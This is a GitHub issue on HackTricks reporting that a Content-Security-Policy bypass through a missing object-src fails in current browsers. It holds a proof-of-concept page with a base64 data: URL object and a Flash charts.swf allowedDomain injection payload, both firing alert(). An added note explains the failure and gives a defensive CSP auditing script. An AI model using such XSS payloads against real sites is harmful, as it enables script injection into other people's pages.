
CSP Bypass: "Lack of object-src and default-src" not working

Open PinkDraconian opened this issue 1 year ago • 1 comments

Relating to this part of HackTricks.

The bypass shown here doesn't work on either the latest Chrome or Firefox. Is there any source where this came from?

PoC:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <!-- only script-src is set: no object-src and no default-src to fall back to -->
    <meta http-equiv="Content-Security-Policy" content="script-src 'self' ;">
</head>
<body>
<!-- data: URL decodes to <script>alert(1)</script> -->
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<!-- Flash-based variant from the referenced write-up (charts.swf with allowedDomain injection) -->
">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
    <param name="AllowScriptAccess" value="always"></object>
</body>
</html>

This results in Content Security Policy: The page’s settings blocked the loading of a resource at inline (“script-src”).

PinkDraconian avatar Sep 02 '22 09:09 PinkDraconian
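Editor's note on why the PoC above fails, followed by an added example (not code from the issue or from HackTricks). The `<object data="data:...">` creates a nested document; data: is a local scheme, so that document inherits the embedding page's CSP and its inline `<script>` is evaluated against the same `script-src 'self'`, which is exactly the "blocked ... at inline (script-src)" message the reporter saw. The Flash variant cannot run at all in current Chrome or Firefox, which removed Flash support in early 2021. What the missing `object-src` does leave open is the set of URLs `<object>`/`<embed>` may fetch, not the policy that script inside them runs under. The evaluator below makes that fallback structure explicit: `parseCsp`, `effectiveSources`, `allowsInlineScript` and `auditPolicy` are names chosen here, the `FALLBACK` table is taken from the CSP Level 3 fallback rules, and the two policy strings are the issue's own policy plus a hardened form constructed for comparison.

```javascript
// Added example, not part of the GitHub issue or of HackTricks: a minimal
// CSP directive evaluator that shows which fetches the issue's policy
// (script-src 'self' ;) actually governs and which it leaves unrestricted.

// Fallback chains per CSP Level 3: a missing directive is governed by the
// first present directive in its chain; an empty chain means "unrestricted".
const FALLBACK = {
  'script-src':      ['default-src'],
  'script-src-elem': ['script-src', 'default-src'],
  'style-src':       ['default-src'],
  'img-src':         ['default-src'],
  'connect-src':     ['default-src'],
  'object-src':      ['default-src'],
  'frame-src':       ['child-src', 'default-src'],
  'worker-src':      ['child-src', 'script-src', 'default-src'],
  'base-uri':        [],   // never falls back to default-src
  'form-action':     [],
};

// Parse "name src src; name src" into Map<name, string[]>. Tolerates the
// stray whitespace in the issue's policy. The first occurrence of a
// directive wins; browsers ignore later duplicates.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// Which directive governs `name`, and with what source list? `sources` is
// null when nothing in the chain is present, i.e. the fetch is unrestricted.
function effectiveSources(directives, name) {
  const chain = [name].concat(FALLBACK[name] || ['default-src']);
  for (const d of chain) {
    if (directives.has(d)) return { governedBy: d, sources: directives.get(d) };
  }
  return { governedBy: null, sources: null };
}

// Inline <script> runs only if the governing directive allows it. A nonce or
// hash in the list disables 'unsafe-inline' (CSP2+), so check that first.
function allowsInlineScript(directives) {
  const { sources } = effectiveSources(directives, 'script-src');
  if (sources === null) return true;
  const lower = sources.map((s) => s.toLowerCase());
  const hasNonceOrHash = lower.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return !hasNonceOrHash && lower.includes("'unsafe-inline'");
}

// Summarise the gaps a reviewer cares about in a script-src-only policy.
function auditPolicy(policy) {
  const d = parseCsp(policy);
  const findings = [];
  if (effectiveSources(d, 'object-src').sources === null) {
    findings.push('object-src unrestricted: <object>/<embed> may load any URL');
  }
  if (effectiveSources(d, 'base-uri').sources === null) {
    findings.push('base-uri unrestricted: an injected <base> can rewrite relative script URLs');
  }
  if (allowsInlineScript(d)) {
    findings.push('inline script allowed by the governing script directive');
  }
  return findings;
}

// The policy from the issue, and a hardened form (constructed here) that
// closes the object-src and base-uri gaps.
const ISSUE_POLICY = "script-src 'self' ;";
const HARDENED_POLICY = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditPolicy(ISSUE_POLICY));              // two findings, but no inline script
  console.log(allowsInlineScript(parseCsp(ISSUE_POLICY))); // false: why the data: object's script is blocked
  console.log(auditPolicy(HARDENED_POLICY));           // []
}
```

Run it with `node` to see the two findings for the issue's policy (object-src and base-uri unrestricted) next to `false` for inline script: the fetch of the `<object>` is allowed, but the inherited policy still blocks the inline script inside the data: document. A cross-origin document loaded through the open `object-src` runs under its own policy, in its own origin, so it does not yield script execution in the target origin either.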

Yes, the third reference of that page brings you to https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d There you can find that technique (which I guess could no longer be working? I will try it)

carlospolop avatar Sep 04 '22 09:09 carlospolop